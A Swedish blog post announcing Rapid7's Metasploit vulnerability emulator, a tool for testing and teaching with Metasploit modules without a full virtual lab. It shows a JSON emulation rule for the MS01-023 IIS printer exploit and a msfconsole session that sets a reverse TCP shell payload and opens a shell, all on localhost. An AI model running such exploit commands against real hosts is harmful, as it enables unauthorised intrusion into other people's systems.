Kategorier
Metodik

Nytt verktyg för att testa Metasploit-moduler

Ett nytt verktyg för att testa metasploit-moduler har släppts. Med hjälp av detta nya verktyg så slipper du installera en hel virtuell miljö med Metasploitable eller liknande. Även är detta nya verktyg bra vid undervisning.

Verktyget är skrivet i perl och kan emulera olika typer av tjänster som du sedan kan köraen auxiliary-modul eller exploit-modul.

Emuleringen definieras med hjälp av JSON-regler som skrivs i service.cfg filen. En tjänst som går att exploita kan se ut så här:

"exploits/windows/iis/ms01_023_printer": {
  "desc": "",
  "extraCmds": "set payload windows/shell_reverse_tcp\r\nsetg LHOST 127.0.0.1",
  "defaultPort": [80],
  "seq": [
    ["regex", "GET http:\/\/.*\/NULL.printer?"],
    ["HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n", ["action", ["connect", ":4444"]]]
  ]
  },

Och sedan när du ska utnyttja den så kör du enligt följande från metasploit:

msf > use exploit/windows/iis/ms01_023_printer
msf > set payload windows/shell_reverse_tcp
msf > setg RHOST 127.0.0.1
msf > setg LHOST 127.0.0.1
msf exploit(ms01_023_printer) > run

[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] Command shell session 4 opened (127.0.0.1:4444 -> 127.0.0.1:51852) at 2017-01-20 10:47:12 -0600

>>ls
README.md
secret.txt
server_cert.pem
server_key.pem
service.cfg
vulEmu.pl

Du kan ladda hem verktyget från Rapid7:s Github-repo här:

https://github.com/rapid7/metasploit-vulnerability-emulator

Lämna ett svar

E-postadressen publiceras inte. Obligatoriska fält är märkta *